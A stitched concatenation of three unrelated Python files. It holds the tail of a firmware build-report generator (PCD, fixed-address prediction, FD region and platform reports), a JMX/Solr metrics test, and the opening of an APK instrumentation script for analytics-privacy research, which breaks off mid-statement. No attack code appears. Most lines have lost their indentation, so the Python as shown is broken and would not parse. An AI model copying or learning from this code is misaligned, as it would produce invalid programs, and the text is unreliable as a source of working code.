self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
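        # Keep only the field overrides that originate from a DSC file, then layer
        # any field values supplied through build options (PcdFieldValueFromComm)
        # on top.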
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for Key, Values in OverrideStruct.items():
if Values[1] and Values[1].endswith('.dsc'):
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in Struct.items():
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
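        # Convert a PCD value string to hex form: plain integers become a hex
        # string, L"..." strings become a list of per-character hex codes plus a
        # 0x00 terminator, "x" becomes the hex ordinal of the character, {...}
        # byte arrays become a list of hex bytes, and anything else is returned
        # unchanged.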
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
if int(str(Module.AutoGenVersion), 0) >= 0x00010005:
RealEntryPoint = "_ModuleEntryPoint"
else:
RealEntryPoint = EntryPoint
if EntryPoint == "_ModuleEntryPoint":
CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "")
Match = gGlueLibEntryPoint.search(CCFlags)
if Match:
EntryPoint = Match.group(1)
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
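        # Parse the platform-wide .map file only once; each matched entry records,
        # per module GUID, the predicted image base ("*I") and entry point ("*E").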
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
    # Invokes the EOT tool to get the predicted execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
        # as the input for the EOT tool, and the dispatch list as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = open(SourceList, "w+")
for Item in self._SourceList:
FileWrite(TempFile, Item)
TempFile.close()
TempFile = open(GuidList, "w+")
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
TempFile.close()
try:
from Eot.Eot import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
        FileWrite(File, gSectionEnd)
##
# Generate Fixed Address report.
#
    # This function generates the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
    # This function generates the predicted fixed address report for a module or
    # the predicted module execution order for a platform.
    # If the input Guid is None, it generates the predicted module execution order;
    # otherwise it generates the fixed loading address report for the module
    # specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nested FVs, they will be listed immediately after
# this FD region subsection.
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
    # This is an internal worker function to discover all the nested FV information
    # in the parent firmware volume. It recursively uses a depth-first search to
    # find all the nested FV names and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
    # If the FdRegion is a firmware volume, it will recursively find all its nested
    # firmware volumes. This function also collects a GUID map in order to dump
    # module identification in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
        # Add the PEI and DXE a priori file GUIDs defined in the PI specification.
#
self._GuidsDb["1B45CC0A-156A-428A-AF62-49864DA0E6E6"] = "PEI Apriori"
self._GuidsDb["FC510EE7-FFDC-11D4-BD41-0080C73C8881"] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
    # This internal worker function generates the report for the FD region.
    # If the type is a firmware volume, it lists the offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
            FvReportFileName = FileExt
            if not os.path.isfile(FvReportFileName):
                FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
                if not os.path.isfile(FvReportFileName):
                    FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = OffsetInfo.keys()
OffsetList.sort()
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VpdFilePath = os.path.join(self.FvPath, "%s.map" % Wa.Platform.VpdToolGuid)
self.VPDBaseAddress = 0
self.VPDSize = 0
self.VPDInfoList = []
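        # Locate the VPD region (a FILE-type region referencing the VPD tool GUID)
        # so its base address can be added to each offset from the VPD map file.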
for index, FdRegion in enumerate(Fd.RegionList):
            if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
if os.path.isfile(self.VpdFilePath):
fd = open(self.VpdFilePath, "r")
Lines = fd.readlines()
for Line in Lines:
Line = Line.strip()
if len(Line) == 0 or Line.startswith("#"):
continue
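                # Each VPD map line (before any '#' comment) has the form:
                #   PcdName | SkuId | Offset | Size | Value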
try:
PcdName, SkuId, Offset, Size, Value = Line.split("#")[0].split("|")
PcdName, SkuId, Offset, Size, Value = PcdName.strip(), SkuId.strip(), Offset.strip(), Size.strip(), Value.strip()
if Offset.lower().startswith('0x'):
Offset = '0x%08X' % (int(Offset, 16) + self.VPDBaseAddress)
else:
Offset = '0x%08X' % (int(Offset, 10) + self.VPDBaseAddress)
self.VPDInfoList.append("%s | %s | %s | %s | %s" % (PcdName, SkuId, Offset, Size, Value))
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Fail to parse VPD information file %s" % self.VpdFilePath)
fd.close()
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if len(self.VPDInfoList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in self.VPDInfoList:
ValueList = item.split('|')
Value = ValueList[-1].strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
ValueList[-1] = ' {'
FileWrite(File, '|'.join(ValueList))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
FileWrite(File, item)
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
    # This constructor function generates a PlatformReport object for a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
    # @param MaList The list of modules in the platform build
    # @param ReportType The kind of report items in the final report file
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
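        # FD (flash) reports are only collected for full platform builds (MaList is
        # None) that provide an FDF profile.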
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contains the routines to collect data and then
# applies a certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
    # This constructor function generates a BuildReport object for a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
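                # Note: "EXECUTION_ORDER" is also a recognized report type (see
                # PlatformReport above) but is not included in the defaults.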
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = StringIO('')
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, True)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
File.close()
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
test_solr.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import threading
import time
from types import ListType
import unittest
import mock
import os
from nose.plugins.attrib import attr
import logging
from aggregator import MetricsAggregator
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/sd-agent/collector.log',
'forwarder_log_file': '/var/log/sd-agent/forwarder.log',
'sdstatsd_log_file': '/var/log/sd-agent/sdstatsd.log',
'jmxfetch_log_file': '/var/log/sd-agent/jmxfetch.log',
'go-metro_log_file': '/var/log/sd-agent/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from sdstatsd import Server
from jmxfetch import JMXFetch
STATSD_PORT = 8127
class DummyReporter(threading.Thread):
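    # Minimal stand-in reporter: periodically flushes the aggregator and keeps the
    # most recent batch of metrics so the test below can poll for them.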
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
        self.metrics_aggregator = metrics_aggregator
        self.interval = 10
        self.metrics = None
        self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='solr')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__))
self.jmx_daemon = JMXFetch(confd_path, {'sdstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testTomcatMetrics(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 8, metrics)
self.assertEquals(len([t for t in metrics if 'instance:solr_instance' in t['tags'] and t['metric'] == "jvm.thread_count"]), 1, metrics)
self.assertTrue(len([t for t in metrics if "jvm." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
self.assertTrue(len([t for t in metrics if "solr." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
|
PAMDroid.py
|
import os
import instrumentation
import Monkey
from multiprocessing import Process
import pexpect
import sys
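# Overall flow: decode the target apk with apktool, instrument the smali code for
# the configured analytics service, rebuild and sign the apk, install it on the
# connected device, and capture logcat output while the user performs a UI test.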
app = 'com.texty.sms'
analyticService = 'Crashlytics'
testPath = '/home/xueling/git/rose6icse/submissions/available/XuelingZhang/testAPP/'
# decode the apk file into smali code
decodeCmd = "apktool d %s -o %s%s" % (testPath+app+'.apk', testPath, app)
print decodeCmd
os.system(decodeCmd)
# perform the corresponding instrumentation according to the analytics service
if analyticService == 'Tune':
instrumentation.tune(app, testPath)
if analyticService == 'Mixpanel':
instrumentation.mixpanel(app, testPath)
if analyticService == 'Branch':
instrumentation.branch(app, testPath)
if analyticService == 'Leanplum':
